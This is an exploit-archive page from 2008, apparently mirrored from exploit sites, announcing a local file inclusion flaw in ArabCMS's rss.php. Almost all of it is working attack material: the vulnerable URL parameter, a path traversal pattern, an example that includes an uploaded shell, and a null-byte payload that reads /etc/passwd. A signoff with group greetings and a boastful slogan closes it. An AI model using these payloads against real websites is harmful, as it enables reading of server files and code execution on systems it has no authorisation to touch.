[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ArabCMS (rss.php rss) Local File Inclusion Vulnerability
# Published : 2008-09-29
# Author : JiKo
# Previous Title : PG Matchmaking Script Multiple SQL Injection Vulnerabilities
# Next Title : ZEELYRICS 2.0 (bannerclick.php adid) SQL Injection Vulnerability
####################################################################################
###### Local File Inclusion Vulnerabilities #####
###### http://www.the-ghost.com/extras/am2/am%202.0%20beta%201.zip #####
###### author : JIKO #####
###### foor read a php file > ?rss=[name of file iwthout php] #####
###### for execute exploit does not write extention of file #####
###### #####
###### #####
###### exploit : /Script/rss.php?rss=../[name of file wthout php] #####
###### #####
###### example : /Script/rss.php?rss==/home/user/shell #####
###### #####
###### other files: rss=../../../../etc/passwd%00 #####
###### WwW.No-exploit.Com cha7ta.eu #####
###### H-T Team , v4 Team , Tryag , no-Back all my friend #####
####################################################################################
------== troops of Mohamed comming inchalah =-----------------
Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
# www.Syue.com [2008-09-29]